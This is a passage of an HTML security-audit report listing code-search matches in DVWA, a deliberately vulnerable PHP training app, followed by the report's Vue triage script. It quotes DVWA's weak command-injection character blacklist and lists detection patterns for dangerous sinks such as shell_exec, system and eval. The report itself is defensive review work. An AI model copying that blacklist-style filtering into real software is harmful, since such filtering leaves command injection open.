class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the user\n<span class=\"line-number\">21:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Password Changed.&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\t}",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 174,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/high.php",
  "filetype": "php",
  "search": "`",
  "match": "<span class=\"line-number\">11:</span> \t\t<span class=\"token string\">'| '</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">12:</span> \t\t<span class=\"token string\">'-'</span>  <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token string\">'$'</span>  <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token string\">'('</span>  <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token string\">')'</span>  <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t\t<span class=\"token string\">'`'</span>  <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">17:</span> \t\t<span class=\"token string\">'||'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t<span 
class=\"token operator\">/</span><span class=\"token operator\">/</span> Remove any of the charactars <span class=\"token keyword\">in</span> the array <span class=\"token punctuation\">(</span>blacklist<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_keys</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$substitutions</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$substitutions</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 16,
  "start": 11,
  "end": 22,
  "severity": "unknown",
  "note": ""
 }
];
    // Search patterns this report was generated from, one row per pattern:
    //   [filetype, search (regular-expression source), count]
    // The app uses this list to build the per-filetype "match" menu links.
    // `count` is presumably the number of hits recorded for that pattern -- confirm
    // against the generator.
    //
    // Reading the results: every pattern except the last one starts with `\s`, so
    // it only matches when whitespace immediately precedes the token. A use such
    // as `($_GET[...]` or `=$_POST[...]` is therefore not counted, and a low count
    // is not evidence of absence. The bare backtick pattern matches any backtick
    // at all, including one inside a quoted string, so its hits need manual triage.
    var searches   = [
      ["php", "\\s\\$_COOKIE", 15],
      ["php", "\\s\\$_FILES", 15],
      ["php", "\\s\\$_GET", 51],
      ["php", "\\s\\$_POST", 66],
      ["php", "\\s\\$_REQUEST", 20],
      ["php", "\\s\\$_SERVER", 15],
      ["php", "\\s\\$_SESSION", 23],
      ["php", "\\sbase64_decode\\s*\\(", 1],
      ["js", "\\seval\\s*\\(", 1],
      ["php", "\\sfile\\s*\\(", 1],
      ["php", "\\sfile_get_contents\\s*\\(", 2],
      ["php", "\\sfopen\\s*\\(", 1],
      ["php", "\\sinclude", 15],
      ["php", "\\sinsert", 12],
      ["php", "\\smd5\\s*\\(", 19],
      ["php", "\\sprepare", 1],
      ["php", "\\squery", 12],
      ["php", "\\srequire", 6],
      ["php", "\\sshell_exec\\s*\\(", 8],
      ["php", "\\ssystem\\s*\\(", 2],
      ["php", "\\supdate", 14],
      ["php", "`", 11]
    ].map(function (row) {
      return { "filetype": row[0], "search": row[1], "count": row[2] };
    });

    // localStorage key under which this report's triage state is read and written.
    var storage    = 'drek-f802fc2e-ece1-40cb-86aa-b7c93429fe8a';

    // Severity labels; 'unknown' is what a match reverts to when its current
    // severity is clicked a second time.
    var severities = ["ok", "warn", "critical", "unknown"];
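    document.addEventListener('DOMContentLoaded', function () {

  // Reads the triage state previously saved for this report.
  //
  // Returns the parsed array, or null when nothing usable is stored. Reading
  // localStorage can throw (storage disabled or blocked for this origin) and
  // JSON.parse throws on a corrupted value; either exception would abort this
  // handler before the Vue app is created, leaving the page stuck on the
  // v-cloak "rendering" notice. Both are treated as "no saved state".
  function loadSavedMatches() {
    try {
      var raw = localStorage.getItem(storage);
      if (!raw) {
        return null;
      }
      var parsed = JSON.parse(raw);
      // the rest of the app groups and filters this value as an array
      return Array.isArray(parsed) ? parsed : null;
    } catch (err) {
      console.warn('Ignoring unreadable saved state for ' + storage, err);
      return null;
    }
  }

  // Saved state replaces the generated match list wholesale.
  // NOTE(review): that includes each entry's pre-rendered `match` markup, not
  // only the `severity` and `note` fields edited in this UI. The '#match'
  // template is not visible here; if it renders `match` as raw HTML, then
  // whatever can write to this origin's localStorage controls markup shown in
  // the report. Restoring only `severity` and `note` onto the generated
  // entries would remove that dependency -- confirm against the template.
  var saved = loadSavedMatches();
  if (saved) {
    matches = saved;
  }

  // component for individual matches
  Vue.component('matches', {
    props    : [ 'match' ],
    template : '#match',

    methods  : {

      // toggles match severity
      severity: function (value) {

        // clicking on a specific severity twice should set severity back to
        // 'unknown'
        this.match.severity = (this.match.severity === value)
          ? 'unknown'
          : value ;

        // emit a 'severity' event to trigger a save to localStorage
        this.$emit('severity');
      },

      // is invoked when notes are added to a match
      annotate: function () {
        // emit an 'annotate' event to trigger a save to localStorage
        this.$emit('annotate');
      }
    },

  });

  // entire Vue app
  var app = new Vue({
    el: '#app',
    data: {
      filetype   : filetype,
      filetypes  : filetypes,
      matches    : matches,
      searches   : searches,
      severities : severities,
      // which severities are currently displayed; all are shown initially
      show       : {
        ok       : true,
        warn     : true,
        critical : true,
        unknown  : true,
      },
    },

    computed: {

      // structure the matches into [search, matches[]] pairs, limited to the
      // selected filetype unless it is 'all'
      groups: function () {
        // read through this.matches (not the outer variable) so the computed
        // value is tied to the app's own data, as filteredSearches does with
        // this.searches
        var selected = (this.filetype === 'all')
          ? _(this.matches)
          : _(this.matches).filter({ filetype: this.filetype });

        return selected
          .groupBy('search')
          .toPairs()
          .value();
      },

      // filter the "match" menu links by filetype
      filteredSearches: function () {
        return (this.filetype === 'all')
          ? this.searches
          : _(this.searches)
            .filter({ filetype: this.filetype })
            .value();
      },

    },

    methods: {

      // filter matches by filetype
      filterFiletype: function (e) {
        var selected = e.target.getAttribute('data-filetype');

        // a click target without the attribute yields null; ignore it rather
        // than filtering everything out
        if (selected === null) {
          return;
        }
        this.filetype = selected;
      },

      // filter matches by severity
      filterSeverity: function (e) {
        var severity = e.target.getAttribute('data-severity');

        // only toggle known severities, so a missing or unexpected attribute
        // value cannot add a stray key to `show`
        if (this.severities.indexOf(severity) === -1) {
          return;
        }
        this.show[severity] = !this.show[severity];
      },

      // shows/hides sections
      hideSection: function (e) {
        // the toggle link is expected two levels below its section element
        var section = e.target.parentElement.parentElement;
        var show    = (section.getAttribute('data-show') === 'true')
          ? 'false'
          : 'true';
        var text    = (e.target.text === 'Hide')
          ? 'Show'
          : 'Hide';

        e.target.text = text;
        section.setAttribute('data-show', show);
      },

      // save match state to localStorage (best effort: the write can fail
      // when storage is unavailable or its quota is exceeded, and that should
      // not break the severity/annotate interaction that triggered it)
      save: function () {
        try {
          localStorage.setItem(
            storage,
            JSON.stringify(this.matches)
          );
        } catch (err) {
          console.warn('Could not save state for ' + storage, err);
        }
      }

    },

  });
});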

  </script>

</body>
</html>